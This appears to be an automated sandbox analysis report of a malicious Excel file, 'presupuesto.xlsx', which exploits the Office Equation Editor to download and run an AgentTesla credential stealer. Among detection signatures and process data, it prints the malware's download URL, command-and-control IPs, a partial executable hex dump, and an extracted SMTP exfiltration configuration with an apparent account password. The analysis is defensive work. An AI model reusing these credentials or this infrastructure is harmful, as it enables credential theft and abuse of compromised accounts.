Loading ...

Play interactive tourEdit tour

Analysis Report presupuesto.xlsx

Overview

General Information

Sample Name:presupuesto.xlsx
Analysis ID:385364
MD5:3e12d73850e8d9123f410160888583fc
SHA1:85538a2279ad0a55a62a90661dc1f6f9e7c1f461
SHA256:be48e27318c1fa71231553d56d22eeee70e1fb66e0cdc9bcfcaddac95cf7763c
Tags:VelvetSweatshopxlsx
Infos:

Most interesting Screenshot:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected AgentTesla
Yara detected AntiVM3
.NET source code contains very large array initializations
Drops PE files to the user root directory
Injects a PE file into a foreign processes
Office equation editor drops PE file
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file access)
Allocates a big amount of memory (probably used for heap spraying)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document misses a certain OLE stream usually present in this Microsoft Office document type
Downloads executable code via HTTP
Drops PE files
Drops PE files to the user directory
Drops certificate files (DER)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

Startup

  • System is w7x64
  • EXCEL.EXE (PID: 1036 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
  • EQNEDT32.EXE (PID: 2536 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • vbc.exe (PID: 2684 cmdline: 'C:\Users\Public\vbc.exe' MD5: D5A549B16706948E4355EB89A93CEDEB)
      • vbc.exe (PID: 3000 cmdline: C:\Users\Public\vbc.exe MD5: D5A549B16706948E4355EB89A93CEDEB)
  • cleanup

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "SMTP Info": "contato@oucabem.com.brz6~Rhjss*B0}smtp.oucabem.com.br"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000004.00000002.2151714670.000000000230A000.00000004.00000001.sdmpJoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
    00000005.00000002.2344911183.0000000002361000.00000004.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
      00000005.00000002.2344911183.0000000002361000.00000004.00000001.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000005.00000002.2344473049.0000000000402000.00000040.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
          00000005.00000002.2345021459.000000000240E000.00000004.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
            Click to see the 6 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            4.2.vbc.exe.3366550.4.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
              5.2.vbc.exe.400000.2.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                4.2.vbc.exe.3366550.4.raw.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security

                  Sigma Overview

                  System Summary:

                  barindex
                  Sigma detected: EQNEDT32.EXE connecting to internetShow sources
                  Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 103.153.76.181, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2536, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49168
                  Sigma detected: File Dropped By EQNEDT32EXEShow sources
                  Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2536, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\svchost[1].exe

                  Signature Overview

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection:

                  barindex
                  Found malware configurationShow sources
                  Source: 4.2.vbc.exe.3366550.4.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "SMTP Info": "contato@oucabem.com.brz6~Rhjss*B0}smtp.oucabem.com.br"}
                  Multi AV Scanner detection for submitted fileShow sources
                  Source: presupuesto.xlsxVirustotal: Detection: 33%Perma Link

                  Exploits:

                  barindex
                  Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)Show sources
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe
                  Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
                  Source: unknownHTTPS traffic detected: 52.59.165.42:443 -> 192.168.2.22:49165 version: TLS 1.2
                  Source: excel.exeMemory has grown: Private usage: 4MB later: 56MB
                  Source: C:\Users\Public\vbc.exeCode function: 4x nop then mov dword ptr [ebp-18h], 00000000h
                  Source: C:\Users\Public\vbc.exeCode function: 4x nop then mov dword ptr [ebp-18h], 00000000h
                  Source: C:\Users\Public\vbc.exeCode function: 4x nop then mov dword ptr [ebp-18h], 00000000h
                  Source: global trafficDNS query: name: fqe.short.gy
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 52.59.165.42:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 52.59.165.42:443

                  Networking:

                  barindex
                  Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
                  Source: TrafficSnort IDS: 2022550 ET TROJAN Possible Malicious Macro DL EXE Feb 2016 192.168.2.22:49168 -> 103.153.76.181:80
                  Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 12 Apr 2021 09:28:38 GMTServer: Apache/2.4.46 (Win64) OpenSSL/1.1.1h PHP/7.2.34Last-Modified: Mon, 12 Apr 2021 07:58:29 GMTETag: "a0800-5bfc1e116a8f9"Accept-Ranges: bytesContent-Length: 657408Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 a5 fd 73 60 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 50 00 00 50 08 00 00 b6 01 00 00 00 00 00 e2 6f 08 00 00 20 00 00 00 80 08 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 60 0a 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 90 6f 08 00 4f 00 00 00 00 80 08 00 dc b3 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0a 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 00 50 08 00 00 20 00 00 00 50 08 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 dc b3 01 00 00 80 08 00 00 b4 01 00 00 52 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 40 0a 00 00 02 00 00 00 06 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c4 6f 08 00 00 00 00 00 48 00 00 00 02 00 05 00 a0 de 00 00 c8 d9 00 00 03 00 00 00 01 00 00 06 68 b8 01 00 28 b7 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1b 30 02 00 1f 00 00 00 00 00 00 00 00 00 28 24 00 00 0a 28 25 00 00 0a 00 de 02 00 dc 00 28 07 00 00 06 02 6f 26 00 00 0a 00 2a 00 01 10 00 00 02 00 01 00 0e 0f 00 02 00 00 00 00 aa 00 02 16 28 27 00 00 0a 00 02 16 28 28 00 00 0a 00 02 17 28 29 00 00 0a 00 02 17 28 2a 00 00 0a 00 02 16 28 2b 00 00 0a 00 2a 4e 00 02 28 09 00 00 06 6f 18 02 00 06 28 2c 00 00 0a 00 2a 26 00 02 28 2d 00 00 0a 00 2a ce 73 2e 00 00 0a 80 01 00 00 04 73 2f 00 00 0a 80 02 00 00 04 73 30 00 00 0a 80 03 00 00 04 73 31 00 00 0a 80 04 00 00 04 73 32 00 00 0a 80 05 00 00 04 2a 00 00 00 13 30 01 00 10 00 00 00 01 00 00 11 00 7e 01 00 00 04 6f 33 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 02 00 00 11 00 7e 02 00 00 04 6f 34 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 03 00 00 11 00 7e 03 00 00 04 6f 35 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 04 00 00 11 00 7e 04 00 00 04 6f 36 00 00 0a 0
                  Source: Joe Sandbox ViewIP Address: 52.59.165.42 52.59.165.42
                  Source: Joe Sandbox ViewIP Address: 103.153.76.181 103.153.76.181
                  Source: Joe Sandbox ViewASN Name: TWIDC-AS-APTWIDCLimitedHK TWIDC-AS-APTWIDCLimitedHK
                  Source: Joe Sandbox ViewJA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
                  Source: global trafficHTTP traffic detected: GET /documenpt/svchost.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Connection: Keep-AliveHost: surestdysbonescagecv.dns.army
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\234E901.emfJump to behavior
                  Source: global trafficHTTP traffic detected: GET /documenpt/svchost.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Connection: Keep-AliveHost: surestdysbonescagecv.dns.army
                  Source: unknownDNS traffic detected: queries for: fqe.short.gy
                  Source: vbc.exe, 00000005.00000002.2344911183.0000000002361000.00000004.00000001.sdmpString found in binary or memory: http://127.0.0.1:HTTP/1.1
                  Source: vbc.exe, 00000005.00000002.2344911183.0000000002361000.00000004.00000001.sdmpString found in binary or memory: http://DynDns.comDynDNS
                  Source: E0F5C59F9FA661F6F4C50B87FEF3A15A.2.drString found in binary or memory: http://apps.identrust.com/roots/dstrootcax3.p7c
                  Source: 77EC63BDA74BD0D0E0426DC8F8008506.2.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
                  Source: vbc.exe, 00000005.00000002.2345021459.000000000240E000.00000004.00000001.sdmpString found in binary or memory: http://d2rIi4JlBhFsgbEW3nM.com
                  Source: vbc.exe, 00000005.00000002.2344911183.0000000002361000.00000004.00000001.sdmpString found in binary or memory: http://epVtFD.com
                  Source: vbc.exe, 00000005.00000002.2345096195.00000000024A6000.00000004.00000001.sdmpString found in binary or memory: http://mail.ita.locaweb.com.br
                  Source: vbc.exe, 00000005.00000002.2346417660.0000000005B80000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
                  Source: vbc.exe, 00000004.00000002.2151684455.00000000022C1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: vbc.exe, 00000005.00000002.2345096195.00000000024A6000.00000004.00000001.sdmpString found in binary or memory: http://smtp.oucabem.com.br
                  Source: vbc.exe, 00000005.00000002.2346417660.0000000005B80000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
                  Source: vbc.exe, 00000005.00000002.2344998147.00000000023E8000.00000004.00000001.sdmpString found in binary or memory: https://api.ipify.org%
                  Source: vbc.exe, 00000005.00000002.2344911183.0000000002361000.00000004.00000001.sdmpString found in binary or memory: https://api.ipify.org%GETMozilla/5.0
                  Source: vbc.exe, 00000004.00000002.2151714670.000000000230A000.00000004.00000001.sdmpString found in binary or memory: https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css
                  Source: vbc.exe, 00000004.00000002.2151905175.00000000032C9000.00000004.00000001.sdmp, vbc.exe, 00000005.00000002.2344473049.0000000000402000.00000040.00000001.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip
                  Source: vbc.exe, 00000005.00000002.2344911183.0000000002361000.00000004.00000001.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49165 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49165
                  Source: unknownHTTPS traffic detected: 52.59.165.42:443 -> 192.168.2.22:49165 version: TLS 1.2
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E0F5C59F9FA661F6F4C50B87FEF3A15AJump to dropped file

                  System Summary:

                  barindex
                  .NET source code contains very large array initializationsShow sources
                  Source: 5.2.vbc.exe.400000.2.unpack, u003cPrivateImplementationDetailsu003eu007b6EA6DFB6u002d9540u002d4164u002dAC49u002dBC328196BE54u007d/u0031C11087Du002d5209u002d4CACu002d8AEDu002dFE9C27240837.csLarge array initialization: .cctor: array initializer size 11958
                  Office equation editor drops PE fileShow sources
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\svchost[1].exeJump to dropped file
                  Source: C:\Users\Public\vbc.exeMemory allocated: 76E20000 page execute and read and write
                  Source: C:\Users\Public\vbc.exeMemory allocated: 76D20000 page execute and read and write
                  Source: C:\Users\Public\vbc.exeMemory allocated: 76E20000 page execute and read and write
                  Source: C:\Users\Public\vbc.exeMemory allocated: 76D20000 page execute and read and write
                  Source: C:\Users\Public\vbc.exeCode function: 4_2_001D58FC NtQueryInformationProcess,
                  Source: C:\Users\Public\vbc.exeCode function: 4_2_001D58F5 NtQueryInformationProcess,
                  Source: C:\Users\Public\vbc.exeCode function: 4_2_001D42B1
                  Source: C:\Users\Public\vbc.exeCode function: 4_2_001D6768
                  Source: C:\Users\Public\vbc.exeCode function: 4_2_001D2831
                  Source: C:\Users\Public\vbc.exeCode function: 4_2_001D8840
                  Source: C:\Users\Public\vbc.exeCode function: 4_2_001D7968
                  Source: C:\Users\Public\vbc.exeCode function: 4_2_001DFAF8
                  Source: C:\Users\Public\vbc.exeCode function: 4_2_001DAE90
                  Source: C:\Users\Public\vbc.exeCode function: 4_2_001D3F00
                  Source: C:\Users\Public\vbc.exeCode function: 4_2_001D6FC8
                  Source: C:\Users\Public\vbc.exeCode function: 4_2_001DF310
                  Source: C:\Users\Public\vbc.exeCode function: 4_2_001DE640
                  Source: C:\Users\Public\vbc.exeCode function: 4_2_001D96F8
                  Source: C:\Users\Public\vbc.exeCode function: 4_2_001D96E8
                  Source: C:\Users\Public\vbc.exeCode function: 4_2_001D8752
                  Source: C:\Users\Public\vbc.exeCode function: 4_2_001DA838
                  Source: C:\Users\Public\vbc.exeCode function: 4_2_001DA848
                  Source: C:\Users\Public\vbc.exeCode function: 4_2_001DB911
                  Source: C:\Users\Public\vbc.exeCode function: 4_2_001DAA71
                  Source: C:\Users\Public\vbc.exeCode function: 4_2_001DAA80
                  Source: C:\Users\Public\vbc.exeCode function: 4_2_001D5B60
                  Source: C:\Users\Public\vbc.exeCode function: 4_2_001DACB0
                  Source: C:\Users\Public\vbc.exeCode function: 4_2_001DACC0
                  Source: C:\Users\Public\vbc.exeCode function: 4_2_00770AA0
                  Source: C:\Users\Public\vbc.exeCode function: 4_2_007718A0
                  Source: C:\Users\Public\vbc.exeCode function: 4_2_007751E7
                  Source: C:\Users\Public\vbc.exeCode function: 4_2_00774E10
                  Source: C:\Users\Public\vbc.exeCode function: 4_2_007713D8
                  Source: C:\Users\Public\vbc.exeCode function: 4_2_00771BB0
                  Source: C:\Users\Public\vbc.exeCode function: 5_2_001E5320
                  Source: C:\Users\Public\vbc.exeCode function: 5_2_001E6340
                  Source: C:\Users\Public\vbc.exeCode function: 5_2_001E5668
                  Source: C:\Users\Public\vbc.exeCode function: 5_2_001ECED8
                  Source: C:\Users\Public\vbc.exeCode function: 5_2_001E2089
                  Source: C:\Users\Public\vbc.exeCode function: 5_2_001EE4E8
                  Source: C:\Users\Public\vbc.exeCode function: 5_2_001EE598
                  Source: C:\Users\Public\vbc.exeCode function: 5_2_005CA428
                  Source: C:\Users\Public\vbc.exeCode function: 5_2_005C58F0
                  Source: C:\Users\Public\vbc.exeCode function: 5_2_005CEE88
                  Source: C:\Users\Public\vbc.exeCode function: 5_2_005C42A8
                  Source: C:\Users\Public\vbc.exeCode function: 5_2_005C4B70
                  Source: C:\Users\Public\vbc.exeCode function: 5_2_005C6F80
                  Source: C:\Users\Public\vbc.exeCode function: 5_2_005CAAE8
                  Source: C:\Users\Public\vbc.exeCode function: 5_2_005C1550
                  Source: C:\Users\Public\vbc.exeCode function: 5_2_005C2948
                  Source: C:\Users\Public\vbc.exeCode function: 5_2_005CBDDC
                  Source: presupuesto.xlsxOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
                  Source: 5.2.vbc.exe.400000.2.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                  Source: 5.2.vbc.exe.400000.2.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                  Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winXLSX@6/20@6/2
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$presupuesto.xlsxJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRC7B1.tmpJump to behavior
                  Source: C:\Users\Public\vbc.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
                  Source: C:\Users\Public\vbc.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
                  Source: C:\Users\Public\vbc.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
                  Source: C:\Users\Public\vbc.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\Public\vbc.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\Public\vbc.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: vbc.exe, 00000004.00000002.2151714670.000000000230A000.00000004.00000001.sdmpBinary or memory string: Select * from UnmanagedMemoryStreamWrapper WHERE modelo=@modelo;?
                  Source: vbc.exe, 00000004.00000002.2151714670.000000000230A000.00000004.00000001.sdmpBinary or memory string: Select * from Clientes WHERE id=@id;;
                  Source: vbc.exe, 00000004.00000002.2151714670.000000000230A000.00000004.00000001.sdmpBinary or memory string: Select * from Aluguel5Erro ao listar Banco sql-UnmanagedMemoryStreamWrapper.INSERT INTO Aluguel VALUES(@clienteID, @data);
                  Source: vbc.exe, 00000004.00000002.2151714670.000000000230A000.00000004.00000001.sdmpBinary or memory string: INSERT INTO UnmanagedMemoryStreamWrapper VALUES(@modelo, @fabricante, @ano, @cor);
                  Source: vbc.exe, 00000004.00000002.2151714670.000000000230A000.00000004.00000001.sdmpBinary or memory string: INSERT INTO Itens_Aluguel VALUES(@aluguelID, @aviaoID, @validade);
                  Source: vbc.exe, 00000004.00000002.2151714670.000000000230A000.00000004.00000001.sdmpBinary or memory string: Insert into Clientes values (@nome, @cpf, @rg, @cidade, @endereco, @uf, @telefone);
                  Source: vbc.exe, 00000004.00000002.2151714670.000000000230A000.00000004.00000001.sdmpBinary or memory string: INSERT INTO Aluguel VALUES(@clienteID, @data);
                  Source: presupuesto.xlsxVirustotal: Detection: 33%
                  Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                  Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
                  Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
                  Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
                  Source: C:\Users\Public\vbc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{172BDDF8-CEEA-11D1-8B05-00600806D9B6}\InProcServer32
                  Source: Window RecorderWindow detected: More than 3 window changes detected
                  Source: C:\Users\Public\vbc.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
                  Source: presupuesto.xlsxInitial sample: OLE indicators vbamacros = False
                  Source: presupuesto.xlsxInitial sample: OLE indicators encrypted = True
                  Source: C:\Users\Public\vbc.exeCode function: 4_2_001D8584 pushad ; retf
                  Source: C:\Users\Public\vbc.exeCode function: 4_2_00774903 pushad ; iretd
                  Source: C:\Users\Public\vbc.exeCode function: 4_2_00774B25 pushad ; iretd
                  Source: C:\Users\Public\vbc.exeCode function: 4_2_00774B1B pushad ; iretd
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\svchost[1].exeJump to dropped file
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file

                  Boot Survival:

                  barindex
                  Drops PE files to the user root directoryShow sources
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXERegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
